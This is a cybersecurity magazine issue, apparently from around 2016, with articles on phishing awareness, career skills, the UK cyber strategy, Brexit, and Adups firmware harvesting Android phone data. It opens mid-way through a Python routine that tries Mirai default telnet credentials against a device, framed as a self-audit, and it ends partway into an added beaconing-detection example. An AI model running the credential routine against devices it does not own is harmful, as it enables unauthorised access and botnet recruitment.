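            if state == "login" and not sent_user:
                s.sendall(user.encode() + b"\r\n")
                sent_user = True
            elif state == "password" and not sent_pass:
                s.sendall(password.encode() + b"\r\n")
                sent_pass = True
            elif state == "shell" and sent_user:
                return True
    return False


def audit_device(host: str, port: int = 23) -> List[Tuple[str, str]]:
    """Return every default credential pair the device at host accepts (empty list is the result you want)."""
    return [(u, p) for u, p in MIRAI_DEFAULTS if try_login(host, u, p, port)]
```

A device that returns anything from audit_device is a bot waiting to be recruited; if the password cannot be changed, the only fixes are to block telnet at the network edge and to keep the device off any segment with a route to the internet.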




Forest Tree The most advanced cyber security solution Forest Tree is a patented advanced Cyber Security solution that allows organisations to monitor and understand the content and context of each electronic communication channel, from documents leaving the organisation, malicious traffic, to user behaviour. The captured network information is processed and systematically analysed in order to extract all the information and metadata contained in the communication channels.

• High performance: 1 Tb/s
• Unique: Patented technology
• Highly scalable: Big data storage
• Proactive: Block advanced threats
• Intelligent: In-depth analysis
• Low maintenance: Purpose built

A single platform solution:

• Network Forensics
• Anomaly Detection
• Security Analytics
• User Profiling
• Machine Learning


We detect advanced threats in seconds and neutralise them in milliseconds www.foresttree.co.uk A defence-grade cyber security product built for the Enterprise, Government and SME marketplaces. Our partner’s ground-breaking monitoring technology – built and improved over 20 years of securing the world’s most sensitive government and commercial information – protects you against the most sophisticated and advanced cyber threats. This coupled with an enhanced Artificial Intelligence engine allows Forest Tree to learn and become an increasingly more effective and efficient tool. The modular approach taken during the development of the Forest Tree solution ensures clients have high levels of personalisation available.


How to Tackle the Human Aspects of Cyber Security
Daryl Flack

About the Author: Daryl Flack is Co-founder and CIO of Blockphish and Security Lead for the Smart Metering Implementation Programme at the Department for Business, Energy and Industrial Strategy (BEIS). Previously, he was CIO of AXELOS, a joint venture between Capita Plc and the Cabinet Office.

Not a day goes by without another cyber breach hitting the news. Recently, we’ve seen breaches impact corporations, individuals and our political systems:

• €53 million stolen from an aerospace parts manufacturer via a phishing scam;
• The US elections potentially influenced following a hack on the Democratic National Committee;
• 1.5 billion individuals’ data stolen from Yahoo in two enormous breaches.

As the number of cyber-attacks increases, so does the potential negative impact to every one of us. If we are to reduce the frequency and volume of cyber breaches and the impact they have, then we are going to need to do more to tackle the human aspect of cyber security. The causes of these incidents may all be different; however, analysis shows that human actions are overwhelmingly at the heart of the vulnerabilities, and that attackers are actively seeking to exploit our human weaknesses to compromise target systems. Often, this is through an employee being tricked using social engineering. For example, up to 91% of cyber-attacks begin with a phishing or spear phishing email. If we can reduce our susceptibility to these attack methods, it will significantly improve our cyber security.



The act of phishing is aimed at trying to solicit a response from a person or group of people via mediums such as:

• Email
• Text (also known as ‘smishing’)
• Phone calls / voicemails (also known as ‘vishing’)
• Social media, or
• A combination of some or all of the above.

The reason why this form of attack is so successful is because the structure and content of these communications are specifically designed to prey on basic human behaviours that we all exhibit. They borrow from the same techniques that people have used for centuries to try and influence others, either consciously or unconsciously. Some examples of the techniques include:

• An urgent request
• Instruction from someone in authority
• Curiosity
• Appealing to your compassion

If the subject matter is compelling enough, it can be hard to resist the urge to carry out the attacker’s request. Susceptible as we may be to our emotional responses, all is not lost. We are adept at assessing and understanding potential threats or risks. However, how people perceive threats can be subjective, based on their personal circumstances and the relevance of a threat to them. If we don’t appreciate the likelihood of a threat happening, then we’re less likely to adjust our behaviour. This is one of the challenges of tackling threats such as phishing: we don’t see a simple everyday task such as opening and responding to emails as being a threat.

To address this, there needs to be a greater understanding of what the threat is, how it could affect us or the company, how we can help to stop it, and most importantly to feel like we have an active part to play. It’s this feeling of responsibility, i.e. an emotional response, that decides whether staff are an active part of your cyber defences or rather part of the vulnerability. Once you have that basic principle instilled, how do you ensure you have the right awareness programme in place to effect real changes in your staff’s behaviours? There are some basic principles that can be used to help in this regard.

MEASURABLE

• Whatever learning you provide needs to be measurable so you can identify what works and what doesn’t. Be willing to take on feedback from your staff and change your approach accordingly.
• This is also where ethical phishing campaigns, if tailored to suit your organisation and carried out correctly, can have a huge benefit. By sending staff an initial ethical phishing email to attain a baseline at the outset, you can then follow up regularly with both ‘all staff’ campaigns and campaigns aimed at specific teams (spear phishing) or individuals (whaling), based on the risks you face. This will provide you with insights into the effectiveness of your training.


REGULAR AND CONCISE

• Delivering a one-hour session once a year won’t have a positive impact or change behaviours for the better. The awareness learning content should be delivered in short modules of ideally 1-2 minutes and no more than 10 minutes: small nuggets of information that people can consume frequently without it affecting their productivity, but which allow them to internalise the key messages.

ADAPTIVE, PERSONALISED AND APPROPRIATE

• The content should use understandable language and be relevant to the audience. People won’t engage in the learning if they don’t understand how the concept or the scenarios it portrays are relevant to them or their role.
• The learning should be tailored to staff role, knowledge and skill levels. Consider short quizzes prior to assigning learning content for staff to complete. This will enable you and the staff to see if they already have the requisite knowledge in one area and allow them to focus their learning on areas in which they are less proficient.

UTILISE DIFFERENT LEARNING FORMATS

• Different people learn in different ways and at different speeds. This needs to be allowed for with different content types and delivery methods to provide accelerated learning.
• Consider content such as videos, animations, games and simulations blended with traditional learning.
• Blend electronic learning with physical delivery mediums and communications such as lunch-and-learns, posters and other rich graphical content identifying the highest risks and threats. Specific breakout sessions with guest speakers work well too. The subject areas here can cover non-corporate areas of focus such as securing your Facebook profile or guidance around online shopping. By making some aspects of the subjects relevant to people in their personal lives, they’ll be more likely to adopt those good behaviours in their corporate lives.

TRY TO MAKE IT ENGAGING, COMPETITIVE AND ENJOYABLE

• This is where the real behaviour changes can happen, because if people enjoy something, they’re much more likely to remember it.
• Consider using incentives and rewards. This can be anything from points and leader boards to encourage competition, to providing a sense of achievement or status. Recognition via benefits can be used too, such as small pay awards for those with the budget, although non-financial incentives such as additional annual leave or specific mentions in annual appraisals can work just as well.

A good approach is to start out in a single risk area such as phishing and grow it over time to include other areas such as password security, social media, information handling and other relevant subjects.

Ultimately, your staff can be one of your strongest defences against cyber-attacks. However, for you to make the most of this potential, your staff will need to:

• Feel it’s their responsibility to understand the threats and protect the company.
• Feel confident they’ve had the necessary training to know what to look for in a potential attack.
• Be vigilant in spotting attempted attacks.
• Be diligent in reporting anything suspicious.

Technology will always be the first line of defence and is incredibly valuable in protecting your organisation, but there will be times when the attackers get through. Then your staff are your last line of defence. Only once you have a cyber-aware workforce with a security culture embedded within your organisation can you be confident in your ability to be resilient to the cyber threats you face.


Key Cyber Security Skills in the Digital Age Kevin Murphy



About the Author: Kevin Murphy (CISM, CISSP, CESP, CEH, ISO27001) is a Cyber Security, Risk and Privacy Specialist at the Royal Bank of Scotland and president of the ISACA Scottish Chapter. He has more than 25 years of experience in enterprise IT processes and systems, serving all service line clients in IT strategy, architectures, IT planning and project management, IT effectiveness and process improvements, systems lifecycles, and operations. A former police officer, Murphy received a Chief Constable’s commendation for a career which included front line policing, e-crime and drug enforcement. Moving into consultancy, Murphy was quickly nominated by the prestigious SC Magazine as one of the top emerging cyber security professionals in Europe.

In the past five years, we have seen the decline of ‘Information Protection’ and the rise of ‘Cyber Security’; the terms ‘Digital Age’ and ‘Internet of Things’ firmly established in our professional lexicon; the continued evolution of the cloud; and the immediate spectre of quantum computing as the next great technological advancement.

By any measure, the cyber security professional is working within a whirlwind of change; the only true constant being humans (for now!) acting as the initiators of this change. The question can therefore be asked: What skills does the cyber security professional require to remain relevant in the workplace? Three core skills are required for a successful career now and for the foreseeable future.

KNOW YOUR BUSINESS

A first requirement is an understanding of the business for which cyber professionals are responsible. Whether this be banking, pharmaceuticals or oil and gas, cyber security professionals cannot be truly effective by simply overlaying generic controls in their environment to protect the information for which they are responsible. This will inevitably lead to gaps and inconsistencies, as some solutions will not be a natural fit to the business model or culture. The control environment should be shaped by the business context. The key business drivers will affect the decision-making process, inform the overall culture and translate into a risk appetite which will determine what controls are invested in and applied. How does the cyber security professional obtain this perspective? It is clear that a mix of academic and experiential learning is a great approach. Firstly, no matter what industry you operate in, there will likely be introductory qualifications you can take to gain a better understanding of the business. For example, the ‘Professional Banker Certificate’ offered by the Chartered Banker Institute is a great introduction to the core concepts of banking. There are no entry requirements for the qualification and it generally requires only a few weeks of self-study. Gaining a professional qualification also has the benefit of demonstrating both your commitment to your business environment and increasing your credibility with stakeholders when engaged in debate.

Business credibility can help gain access to the second key area in developing business knowledge – experiential learning. Though many of us may view our audit colleagues with trepidation, it remains one of the best areas in an organisation to gain an insight into the business and develop business knowledge.

Any cyber security professional would benefit from a secondment or shadowing opportunity within an audit function. Primarily, audit will provide exposure to a range of issues facing the organisation, thereby offering the cyber security professional a holistic view when providing control assessments and solutions. Secondly, any professional would benefit from audit experience – developing a cogent writing style, applying an investigative methodology, presenting fact-based conclusions, and the experience of having difficult conversations with positive outcomes are all valuable skills gained by the audit professional.

The cyber security professional should not limit his or her experience to audit. Key skills can also be obtained by working in the risk function, thereby understanding the concepts of key risk indicators, performance indicators and risk appetite statements – all important aspects when documenting a business case and detailing the return on investment should a particular security solution be advanced. Other areas of note include Human Resources and Marketing to understand how personal information is handled and secured. In sum, the cyber security professional should maintain a healthy interest in all business functions to ensure an effective understanding of the information lifecycle.

KNOW THE RISKS

The second requirement to remain effective in the workplace is for the cyber security professional to maintain a base level of subject matter expertise. The diverging and increasingly sophisticated forms of technology, ranging from cloud to quantum computing, will make it increasingly difficult for the cyber security professional to specialise in more than one discipline. Their role will therefore evolve into becoming an informed interface between technology and business stakeholders.

To be effective in this ‘nexus’ function, the cyber security professional will require a common denominator of subject matter expertise. The globally recognized qualifications offered by ISACA are a good step in this direction, particularly the CSX Practitioner, CISM and CRISC designations. But what defines a ‘base level of expertise’? The cyber security professional should consistently review the risk landscape and challenge whether they have the expertise to provide informed comment on the threats an organisation faces. For example, in the previous decade, the ability to counter fraud through money laundering was a major area of focus for the regulator. Now, it can be argued that with the EU General Data Protection Regulation an understanding of the data lifecycle in an organisation is fundamental to the role of the cyber security professional. ‘Privacy’ can no longer be seen as distinct from cyber security, since a key tenet of the legislation is how the confidentiality, integrity and availability of personal information are maintained.

So, what are the risks in the foreseeable future? It is likely that with the onset of quantum computing, the cyber security professional shall require a more detailed understanding of cryptography as organisations transfer from classical computing to a medium where many current forms of encryption are obsolete. The cyber security professional will have a key role in managing this transition and interfacing with technology providers, business stakeholders, the privacy team, legal department and more.
KNOW YOURSELF

What will enhance the cyber security professional’s ability to interface with such a diverse range of stakeholders on a myriad of subjects? Excellent interpersonal skills will clearly be at a premium. How quickly can you synthesise many sources of information, then deliver this effectively in one paragraph or a five-minute pitch to the executive? To ensure these skills remain effective, the cyber security professional has a responsibility to be objective in assessing his or her abilities and should consistently strive to improve. This development can be aided by employing the help of a more experienced mentor. Thankfully, many professional organisations now offer mentoring as part of their training environment. When development areas have been identified, the next step is to build these into an action plan with set goals and timeframes. Key to this process is the ability to practise these skills in a safe environment. For example, if you are nervous about an upcoming presentation to the board, practise first in front of your colleagues and slowly build that experience in a constructive environment. Also, volunteer for activities which use the skills you need to acquire, as you will quickly develop confidence with practice. If these activities cannot be found in your organisation, ISACA has a designated area of its website where many opportunities can be found, ranging from the development of academic programmes to organising the next international conference. Finally, the ability to travel and work in different jurisdictions should not be understated. Drawing on our earlier discussion regarding business culture and its linkage to risk appetites, the opportunity to work in different parts of the world can provide invaluable experience, both broadening your interpersonal skills in how you interact with others and providing different approaches to common problems.

THE TAKEAWAY

The role of the cyber security professional is unique: What other position requires conversations with so many other areas of the organisation? What profession encompasses such a range of topics from adequate fencing to cryptographic algorithms? Or skills that include presenting to an audience of 100 people and providing a one-paragraph summary for a press release?

Presented like this, the cyber security profession can be exciting and daunting in equal measure. To help navigate these challenges effectively, professionals must understand their business and know the risk environment to the extent they can provide an informed opinion. Ultimately the cyber security professional is a leader who should role model the values of continual improvement, be solution-orientated, always act in the best interests of the organisation, and help any colleague who requires assistance.


Expert Opinion Talal Rajab

A techUK Analysis of the UK Government’s National Cyber Security Strategy

About the Author: Talal Rajab is the Head of Programme for techUK’s Cyber and National Security programmes. He manages strategic relationships between Government and industry members on cyber and national security related issues, in particular through the Cyber Growth Partnership. He also leads techUK’s work on the Investigatory Powers Bill. He has a parliamentary background, having joined techUK from the Industry and Parliament Trust (IPT), where he managed the IPT’s business relations and led on the Trust’s Cyber Security Commission.

On Tuesday 1st of November, the UK Government announced the publication of its National Cyber Security Strategy. Underpinned with a £1.9bn investment, it sets out how the UK will use automated defences to defend citizens and businesses against growing cyber threats, support the UK’s growing cyber security industry, develop a world-class cyber workforce and deter cyber-attacks from criminals and hostile actors. The Government would be the first to admit that past policies on cyber security have not achieved the scale and pace of change required to stay ahead of the ever-changing cyber threat. For many digital services and products emerging on the market today, security has been an afterthought. Too many organisations are suffering basic breaches, too few investors are willing to risk supporting entrepreneurs in the sector and there is a lack of graduates and others with the right skills emerging from the education and training system. To address these failures, the new £1.9bn Strategy will therefore focus on three key themes:

DEFEND: This strand of the Strategy, focusing primarily on the UK’s critical national infrastructure, aims to ensure that the UK has the means to defend itself against evolving cyber threats, to respond effectively to incidents and to ensure UK networks, data and systems are protected and resilient. In this regard, the new National Cyber Security Centre (NCSC) will provide leadership to industry on key national cyber security issues, and work with the Ministry of Defence’s (MoD) Cyber to help the Armed Forces respond to a potential, significant national cyber attack through active cyber defence (ACD) measures. The ‘Defend’ strand of the Strategy will also focus on ensuring that all government digital services built or procured have security ‘built in by design’, working closely with the Government Digital Service (GDS), the Crown Commercial Service (CCS) as well as NHS Digital in order to implement new data security standards. This is an area that techUK will look at increasingly in 2017,

ensuring that the Government’s digital transformation agenda is underpinned with security.

DETER: The ‘Deter’ strand of the Strategy will be led by the intelligence agencies, the Ministry of Defence, law enforcement and the National Crime Agency, in coordination with international partner agencies. It will see the Government investing in detecting, understanding, investigating and disrupting hostile actions taken against businesses and the public sector, pursuing and prosecuting cyber criminals whilst reserving the right to take offensive action in cyberspace. One of the main objectives of this strand of the Strategy is to reduce cybercrime. Law enforcement has traditionally been underfunded in this regard, as highlighted by techUK’s recent ‘Partners Against Crime’ report, so it is good to see a commitment to enhancing law enforcement’s capabilities and skills at a national and local level, as well as establishing a new reporting system in order to share information across law enforcement in real time. Interestingly, the strategy recognises the importance of encryption to the protection of the UK’s most sensitive information and stresses that the UK will continue to maintain its sovereign capability in this area, whilst working with industry to ensure that there are no ‘safe spaces for…criminals to operate beyond the reach of the law’.

DEVELOP: This strand of the Strategy will focus on growing the UK’s cyber security industry, investing in accelerator programmes, scientific research and skills. As part of this, the Strategy highlights the creation of two new cyber innovation centres to drive the development of cutting-edge cyber products and dynamic new cyber security companies as well as allocating a proportion of the £165m Defence and Cyber Innovation Fund to support innovative procurement in defence and security.

The Government will also support the creation of a growing cyber security sector, helping UK companies and academics develop the commercial and entrepreneurial skills required to grow. The two new cyber innovation centres will sit at the heart of this section of the Strategy, giving companies the required assistance to get their first customers and attract further investment. A proportion of the £165m Defence and Cyber Innovation Fund will also be put towards this, as well as the provision of testing facilities for companies to test products. Reassuringly, the Strategy also makes reference to the collective expertise of the Cyber Growth Partnership (CGP), for which techUK continues to provide the secretariat, in order to focus further growth and innovation interventions.

On the topic of cyber security skills, the strategy sets out a long-term skills project that builds on existing work to integrate cyber security into the curriculum so that everyone studying computer science, technology or digital skills will learn the fundamentals of cyber security. This effort will also attempt to address the gender imbalance in cyber professions and to attract people from more diverse backgrounds, and will be spearheaded by a cyber skills advisory group made up of government, employers, professional bodies, and education providers.

INTERNATIONAL ACTION

Finally, the strategy recognises the importance of co-operation with international partners on cyber related issues. This includes an assurance that international law and human rights apply in cyberspace, a commitment to a multi-stakeholder model of internet governance, an opposition to data localisation and working towards the raising of cyber security capacity within partner countries. A large proportion of this section focuses on helping other countries develop and maintain their own cyber security, building their capacity to tackle cyber threats to the UK.

TECHUK RESPONSE

It is reassuring to see that, in its approach to cyber security standards within the digital economy, the Strategy takes an interventionist stance that aims to raise standards across the UK. The Government has admitted that a ‘market approach’ to the promotion of basic cyber security hygiene has in the past not produced the required pace and scale of change, with take-up of initiatives such as Cyber Essentials having been low. It is true that the market is not valuing and managing cyber risk correctly and techUK therefore welcomes the recognition that businesses need to ‘up their game’ in regards to cyber security. The Government has a role to ‘set the pace’ and lead the way by bringing its influence and resources to bear to address cyber threats, though it cannot do this alone. The strategy is also a lot clearer, for the first time, about the nation state cyber threats facing the UK and more confident and aggressive in its response to such threats. Whilst it could be argued that the strategy is too broad in certain areas, it is still good to see the Government aiming high and trying to ensure that the UK is a safer place to conduct digital business (though it will be difficult to cover all of the initiatives announced in a five-year plan). One criticism, however, is the lack of recognition within the Strategy that much of the world’s innovation in cyberspace comes from the US and increasingly the Far East. The Government should commit more heavily to engaging with innovators around the world, which will in turn help UK companies grow. Overall, the Strategy is a robust and comprehensive response from Government to the growing cyber threats that we face. It is now time for businesses across the country to step up and play their part in keeping their businesses and the UK as a whole secure.

Secgate Technologies Fast Intelligent Protection At Secgate Technologies we deliver information technology and intelligence solutions that both strengthen and empower our clients’ IT security and resilience. Our tools give clients technology capabilities that allow them to analyse, correlate, identify and eliminate threats. We are industry experts and leading technologists who have built a suite of solutions with proven defensive capabilities that tackle IT threat detection, analytics and IT incident response. Our flagship product, Forest Tree, has been successfully deployed in a number of complex and unique environments. Part of the specialist advisory group Secgate, our clients include large enterprises, governments and SMEs.

www.secgate.co.uk/technologies



Rising Star Siming Wei

Rising Star is a new featured section of Cyber World. With our monthly interviews we introduce our Readers to a promising rising star in the Cyber Security Industry. We want to learn about what motivates these future leaders in the world of cyber, about their background, personal and professional development, specialisations and interests, as well as their goals for the future. And we also ask them to offer some advice for the benefit of the next generation interested in entering careers in this fast-growing industry.

Siming Wei is a Cyber Security Senior Associate at PwC. She joined PwC after completing a master’s degree in Wireless and Optical Communications. Siming has also achieved a first class degree in Electrical Engineering. She is currently studying part-time for a second master’s degree in Information Security at the Royal Holloway University.

Please tell us a bit more about yourself.

I joined the PwC Cyber Security Practice in 2014 after completing a master’s degree in Wireless and Optical Communications. Over the past two and a half years, I have really delved into the exciting world of cyber security, working on a variety of projects in areas ranging from information security management to identity access management across a number of industries.

What made you choose a career in Cyber Security?

Making things happen and making things better always give me a great sense of satisfaction. This was the driving force for me behind choosing a degree in engineering. With the inspiration to encourage more young people and especially girls to study STEM subjects, I became a STEM ambassador at University. This is where I encountered cyber security for the first time. Thanks to the IT-related modules in my degree, I was able to understand more about information technology and started to pay more attention to news concerning information security. Upon my graduation, and being attracted by the PwC brand, I went on the graduate recruitment website and found that they were recruiting graduates for cyber security roles. I always wanted to work in the technology field, so after doing some research on cyber security, I decided it is a very interesting field that offers a promising career.

What are the greatest positives about working in Cyber Security?

Cyber security as an industry is constantly growing and evolving with the rapid advance of new technologies. Therefore, the work is never boring and no two days are the same. Gaining exposure to different problems clients are facing and helping them solve these problems has been a very rewarding experience. Cyber security is becoming much more important to business, and thus it is a great pleasure to take part in shaping the cyber security world to enable business growth. It is exciting to work in a very diverse team of people from different backgrounds here at PwC. The amazing people I work with help me to learn new things every day.

What are the greatest challenges in Cyber Security?

Over the past few years, a few high-profile security incidents have caused both individuals and organisations to wake up to the importance of cyber security. We have seen quite a lot of organisations starting to seriously invest in cyber security. However, according to the Global State of Information Security Survey 2016, insider threats are still the top risk to organisations. Building the right culture to encourage employees to be secure is the biggest challenge. Organisations must realise that only investing in technologies will not be sufficient to improve the organisational information security posture. People, processes and technologies should all be considered when building and improving their information security capability overall.

What are the highlights of your career?

Joining PwC has been the biggest change in my life and is definitely a highlight in my career. The great opportunities and enormous support I received from the firm and colleagues have really helped me to learn and develop as a cyber security professional. Another highlight of my career has been working on the Cyber Security Challenge Masterclass 2016, which is the culmination of a national competition programme to identify new cyber security talent and was this year designed and hosted by PwC. It is run by the Cyber Security Challenge UK, a non-profit organisation backed by the government and industry bodies. The event itself has helped to raise awareness in society, and encourage people – especially young people – to work in cyber security. It was an amazing experience to project manage this high-profile event and to be involved from the beginning to the end in game design, event management, marketing and PR for more than 6 months.

Where do you see Cyber Security in 10 years?

With the constantly changing landscape of threats, I believe that cyber security in 10 years will be very different from today. The Internet of Things, the Cloud and other new internet-based technologies, while introducing great convenience and productivity to our lives, can introduce new risks to cyber security and privacy. Cyber security practitioners and law enforcement agencies will need to respond to new challenges. With GDPR coming into force in 2018, organisations are required to do more to demonstrate they can safeguard the information they are handling. In 10 years, new regulations and industrial standards may be created to address cyber security in new technologies such as drones, driverless cars and smart homes.

What are your career ambitions?

Since cyber security is such a broad topic, it is very difficult to be an expert in all areas. With my experience growing, I would like to become a ‘go to’ person in a specific field of cyber security to solve some of the important problems in society. As I am still at the early stage of my career, I would like to build a good understanding of different areas in cyber security before choosing my areas of expertise. With the rapid advances in technology, there will be so many new risks to be mitigated and new assets to protect in cyber security in 5-20 years. Therefore, I want to keep an open mind and be the best I can when opportunities arise.

What would you do if you were not a consultant?

I would probably be an electrical engineer in the renewable and green energy sector. I would love to use the knowledge and the problem-solving skills I acquired through my degree to tackle energy shortage and the pollution that comes with electricity generation.

What advice would you give young people hoping to enter a career in the field?

My advice for young people is to study what you are really passionate about and interested in. Follow your heart instead of your peers. Whatever you choose to study, the skills you developed are transferable and valued in cyber security. We have a very diverse team here in PwC and we value the different backgrounds and skills each individual brings to the team. Entering a career in cyber security will open up opportunities in many areas and on a wide range of issues. There are so many areas you can go into such as penetration testing, digital forensics and information security governance. You can explore and specialise in the area you are interested in the most. All you need is to be open-minded and ready to learn.

Brexit could deal blow to UK’s Cyber Security Chris Luenen

About the Author: Chris Luenen is an experienced international security expert with over 10 years’ experience working in political foundations, academia and think tanks. He has worked with leaders in financial services institutions, industry and international organisations as well as senior politicians, journalists and academics.

The outcome of the recent referendum on the question of Britain’s membership in the European Union has many important implications. These range from the exact modalities of Britain’s future relationship with the EU and other EU member states, the free movement of labour on the continent, the continued stability of the UK housing market, financial services sector and the overall economy to the question of the very future of Great Britain, and especially Scotland’s role in the Union. While many commentators have rightly pointed out that a very much under-appreciated aspect of Brexit concerns security, the issue of cyber security deserves particular attention in this context. In our increasingly interconnected world, cyber security concerns everyone, from states, large corporations and SMEs to individuals, and attacks and security breaches are on the rise worldwide. The number and severity of breaches recorded are unprecedented, and the culprits are diverse, ranging from the youthful hacker in his parents’ basement, through criminal gangs, hacktivists and terrorists, to state-sponsored hackers. The implications of a possible Brexit with regard to cyber security do not just touch on questions of the UK’s national security, but also on the continued competitiveness of the UK’s booming cyber security industry, one of the few remaining growth markets in a depressed global economy, as well as on the competitiveness and security of non-cyber related industries and services.

IMPACT OF A BREXIT ON THE UK’S CYBER SECURITY INDUSTRY

Cybercrime is best combated in partnership with others and by establishing strong and resilient cooperative mechanisms for doing so, and the EU has done much in recent years to raise the level of, and harmonise, cyber security capabilities, regulations, information sharing and cooperation, and facilitate best practice, across the continent. As Britain’s future relationship with the EU remains uncertain, in the coming months and years it will have to redefine several aspects of a relationship that has previously been taken for granted. This will include a decision on its future relationship with the European Crime Centre (EC3) and Europol as well as with the European Union Agency for Network and Information Security (ENISA) and the newly created European Cyber Security Organisation. Irrespective of the specific details of its continued engagement with any individual EU agency, network or initiative, a full Brexit will at the very least mean that Britain will no longer have a say in devising any directives and policies the EU develops, and which will be implemented across Europe, and may be left having to play catch-up after the fact.

A particular uncertainty in this context relates to the adoption of the EU’s General Data Protection Regulation (GDPR) and the Data Protection Act (DPA). While these regulations will come into effect before the UK potentially departs from the EU, there will be no obligation for the UK to uphold these regulations thereafter. Should the UK decide not to uphold these regulations, then it will become much more difficult, and costly, for UK companies to continue to do business in the EU on a par with their European partners and competitors, and to demonstrate compliance with its regulations and norms. Similarly, it is uncertain whether the UK will adopt the new directive on security of network and information systems (NIS), which was adopted throughout the European Union in August.

SHORTAGE OF CYBER PROFESSIONALS SET TO BECOME WORSE

While an argument could be made that the United Kingdom might currently be ahead of its European partners with regard to its overall cyber security posture and measures, this advantage is set to wane as the UK’s pool of talented cyber security professionals diminishes over time – a very real prospect should the UK decide to end, or restrict in any meaningful way, the free movement of labour between the UK and EU member states. According to Diane Miller of Northrop Grumman, a leading expert on the cyber profession, there is already an estimated shortage of 1.5 million cyber security professionals over the next five years, and new talent is not easy to come by. If travel restrictions were imposed, it would be significantly less attractive for talent to come and work, and build a career, in the UK.

LOSING ACCESS TO EU INVESTMENT

Yet another way in which the United Kingdom will find itself affected by a Brexit is through the loss of access to the EU’s substantially increased investments into cyber security in recent years. Leaving the European Union will cut the United Kingdom off from the Union’s funding streams for cyber security initiatives, companies, and technologies, including the recently announced, and major, Public Private Partnership (PPP) programme, which is set to raise an expected €1.8bn of investment in cyber security. When combined with the potential drop in the cyber security talent pool that the United Kingdom might experience in the years ahead, the loss of these advantages and funding streams will deal a big blow to the overall health and viability of the cyber security industry in Britain, and is unlikely to be compensated by investments from the UK government and private sectors.



CONCLUSION

The future relationship between Britain and the EU, or even the trajectory for how Britain will seek to extricate itself from the EU and revise, rewrite or create new laws, regulations and new mechanisms for cooperation, remains very much uncertain. When considering the potential implications for both the EU's and the UK's national, economic and citizens' personal security, the competitiveness and growth of their respective cyber security industries and many related issues, there is not much room for error.

How vulnerable we have all become to cyber crime should be clear at least since the Equation Group, the hacker group widely attributed to the US National Security Agency, fell victim to a substantial security breach: part of its offensive toolkit of exploits and other cyber 'weapons' was stolen and offered for auction in August 2016, apparently by a previously unknown group of hackers calling itself The Shadow Brokers.


Leron Zinatullin is an experienced risk consultant, specialising in cyber security strategy, management and delivery. He has led large scale, global, high value security transformation projects with a view to improving cost performance and supporting business strategy. He has extensive knowledge and practical experience in solving information security, privacy and architectural issues across multiple industry sectors.

The Psychology Of Information Security

In today's corporations, information security professionals have a lot on their plate. In the face of constantly evolving cyber threats they must comply with numerous laws and regulations, protect their company's assets and mitigate risks to the furthest extent possible. The Psychology of Information Security redresses the balance by considering information security from both the security professional's and the end user's viewpoint, in order to gain insight into security issues relating to human behaviour and to help security professionals understand how a security culture that puts risk into context promotes compliance.

Security professionals can often be ignorant of the impact that implementing security policies in a vacuum can have on the end users’ core business activities. These end users are, in turn, often unaware of the risk they are exposing the organisation to. They may even feel justified in finding workarounds because they believe that the organisation values productivity over security. The end result is a conflict between the security team and the rest of the business, and increased, rather than reduced, risk. This can be addressed by factoring in an individual’s perspective, knowledge and awareness, and a modern, flexible and adaptable information security approach. The aim of the security practice should be to correct employee misconceptions by understanding their motivations and working with the users rather than against them – after all, people are a company’s best assets.


This book draws on the experience of industry experts and related academic research to:

• Gain insight into information security issues related to human behaviour, from both end users' and security professionals' perspectives.
• Provide a set of recommendations to support the security professional's decision-making process, and to improve the culture and find the balance between security and productivity.
• Give advice on aligning a security programme with wider organisational objectives.
• Manage and communicate these changes within an organisation.

Based on insights gained from academic research as well as interviews with UK-based security professionals from various sectors, The Psychology of Information Security – Resolving conflicts between security compliance and human behaviour explains the importance of careful risk management and how to align a security programme with wider business objectives, providing methods and techniques to engage stakeholders and encourage buy-in.


Adups Firmware Vacuuming up Android Phone Data

Back in November, The New York Times reported that the security research firm Kryptowire had discovered that 'several models' of Android phones were shipped with firmware installed that vacuumed up text messages, location data, the IMEI and contacts, and then sent this information to a server in Shanghai every 72 hours, without the owner's knowledge or consent. The firmware also allows the remote installation and execution of code, again without the owner's knowledge or consent. But there has been no follow-up on the story. In particular: is the firmware still on new phones being distributed, and on which models exactly? Who is recording this data, and why?

The software in question is firmware that helps mobile carriers do over-the-air updates. The firmware with the recording features is aimed at the low-end Android market. We know that much. A researcher at Kryptowire discovered by accident that a BLU R1 HD phone he had purchased was connecting to IP addresses at adups.com and other domains. So he conducted further analysis and found that the phone was transmitting data in JSON format using a REST web service call. He then investigated what data the phone was transmitting.

Kryptowire says that Adups claims on its website to have 700 million active devices in the field and a market share of over 70% in 150 countries, and that its software is integrated with 400 wireless carriers. The phones with the firmware were sold on Amazon and Best Buy. Adups provides software to two Chinese mobile phone manufacturers, ZTE and Huawei. But those figures come only from 'old' information and sources. What we do not have is a list of which phones are affected right now.

Adups also provides big data services to its customers. Obviously the question poses itself whether this is a Chinese government effort to spy on its citizens or just bad planning by the manufacturer. The New York Times quoted Adups as saying that the software was written 'at the request of an unidentified Chinese manufacturer' and that the company wanted the data for customer support and to block spam calls and texts. The New York Times wrote: 'The American authorities say it is not clear whether this represents secretive data mining for advertising purposes or a Chinese government effort to collect intelligence.' The Adups attorney responded by stating that 'this is a private company that made a mistake.'

Google told Adups to remove any feature that uses Google Play Services. But Google does not operate in China. Google Play Services is a library that Android programmers use for things like integrating with Google Maps and sharing objects; it is not required to write an Android app. More to the point, the Adups component is not an ordinary app that a user installs and can remove: it ships inside the manufacturer's firmware image as a privileged system component (Kryptowire's advisory describes it executing remote commands with system privileges and bypassing the normal Android permission model). A user cannot uninstall it, and on a device sold without Google services Google has no channel through which to push a change. So Google's action would have changed nothing for those phones.

Huawei and ZTE have not produced a list of which phones have this version of the firmware installed. BLU is an American company and has already removed the firmware. So the obvious conclusion is that there are phones out there still vacuuming up data and sending it to Adups in Shanghai. How many of these are in the USA or Europe is impossible to know for sure. We have no list. And Kryptowire only tested one phone. Tom Karygiannis, Kryptowire's VP of Products, stated: 'I am pretty sure they are in the Chinese market. There are more devices that I am sure they have it. But we would have to test it in our labs to know.'
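The observation that started the story, a phone contacting adups.com hosts on a fixed schedule, is something a network team can look for in ordinary egress logs rather than waiting for a researcher to notice it by hand. The following is an added example, not code from the article or from Kryptowire: it parses a constructed log of outbound connections, keeps only those to a suspect domain, and flags device/host pairs whose contacts recur at a near-constant interval (72 hours here, the cadence the article reports for the uploads). The log format, device identifiers, host names, timestamps and byte counts are all made up for illustration; only adups.com comes from the article.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean

# Constructed sample of outbound-connection records (illustrative, not real traffic):
# "<ISO timestamp> <device id> <destination host> <bytes sent>", one per line.
# dev-a uploads to an adups.com host every ~72 hours; dev-b touches it only twice,
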